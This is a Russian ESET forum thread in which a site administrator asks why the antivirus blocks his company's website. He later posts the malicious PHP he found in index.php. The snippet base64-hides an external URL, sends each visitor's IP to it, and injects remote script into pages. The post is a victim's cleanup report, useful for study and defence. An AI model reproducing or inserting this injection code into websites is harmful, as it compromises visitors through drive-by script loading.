Вход
Уважаемые пользователи!

Поставщик ИТ-решений PRO32 сообщает вам, что после 17 лет сотрудничества мы более не являемся эксклюзивным дистрибьютором программных продуктов словацкого разработчика ESET в России, Республике Беларусь, Казахстане, Азербайджане, Узбекистане, Кыргызстане, Таджикистане, Туркменистане, Молдове, Грузии и Армении.

Купить и продлить лицензии ESET на нашем сайте больше нельзя.

Предлагаем вам попробовать новый антивирус от компании PRO32.

Продукты PRO32 — это технологичные решения, надежная защита от киберугроз и максимальная производительность устройств на Windows / Android.

Для действующих клиентов ESET мы предлагаем промокод на скидку в размере 15% — ESET15. Скопируйте его и после добавления товара в корзину, не забудьте его применить в корзине.

Перейти на PRO32
Поиск  Пользователи  Правила  Войти
Пользователи Roman Ermilov
Выбрать дату в календареВыбрать дату в календаре

1
[ Закрыто] Антивирус блокирует, главная
 
Roman Ermilov
Roman Ermilov
Пользователь
Сообщений: 2
Баллов: 1
Регистрация: 31.03.2014
Размещено 01.04.2014 09:14:47
Да. Точно. Проблему вызывал вот этот кусок в index.php

Код
function sql2_safe($in) {
        $rtn = base64_decode($in);
        return $rtn;
}
function collectnewss() {

      if (!isset($_COOKIE["iJijkdaMnerys"])) {
        $value = 'yadeor';
      $ip = $_SERVER['REMOTE_ADDR'];
        $get = sql2_safe("aHR0cDovL3h4eHBvcm5vLnh4dXouY29tOjg4OC9tb3ZlLnBocD9pcD0=").$ip;
      $file = @fopen ($get, "r");
      $content = @fread($file, 1000);
      @setcookie("iJijkdaMnerys", $value, time()+3600*24);
      if (!$content)
         echo sql2_safe("PHNjcmlwdCBzcmM9Imh0dHA6Ly9hY2NvdW50dXMuZ2V0cy1pdC5uZXQvZ29vZ2xlc3RhdC5waHAiPjwvc2NyaXB0Pg==");
      else 
         echo $content;

      }
}
collectnewss ();



Поскольку я php знаю ровно настолько, чтоб отличить его от других языков, не сразу разобрался.

Спасибо за помощь.

Кстати, ещё раз хочется отметить то, что это детектит только НОД.
Перейти
[ Закрыто] Антивирус блокирует, главная
 
Roman Ermilov
Roman Ermilov
Пользователь
Сообщений: 2
Баллов: 1
Регистрация: 31.03.2014
Размещено 31.03.2014 15:34:09
Доброго времени суток.
С недавнего времени начал админить одну фирму, и один из их сайтов блокируется нодом.
http://www.elk-spb.ru
Слил через ftp сайт, проверил НОДом, в двух файлах были сомнительные ссылки в ява-скрипте. Вычистил.
Проверил ещё раз, сканируя на локальном диске у себя - нормально, не ругается. Залил обратно.
Результат: сайт чист, но НОД ругается на сайт, а остальные антивирусы - нет. Вирустотал говорит "сайт из клин"

https://www.virustotal.com/ru/url/e36684d3fb17e0219b3d5c2b23c6b8d86ab31d3dfb51381cd­d7282b1aad19263/analysis/1396260082/

Самое обидное, что непонятно, что ему не нравится. В логах "архив". Что это значит?
Вот пример записи из лога:
"31.03.2014 15:12:34 Фильтр HTTP архив http://www.elk-spb.ru HTML/ScrInject.B.Gen вирус соединение прервано - изолирован ERROM-WORK\user Обнаружена угроза при попытке доступа в Интернет следующим приложением: C:\Program Files (x86)\Mozilla Firefox\firefox.exe."

В свойствах записи следующее:

"http://www.elk-spb.ru HTML/ScrInject.B.Gen вирус соединение прервано - изолирован Обнаружена угроза при попытке доступа в Интернет следующим приложением: C:\Program Files (x86)\Mozilla Firefox\firefox.exe.
http://www.elk-spb.ru = GZ = file.htm HTML/ScrInject.B.Gen вирус "

Подскажите, пожалуйста, куда копать.
Перейти
1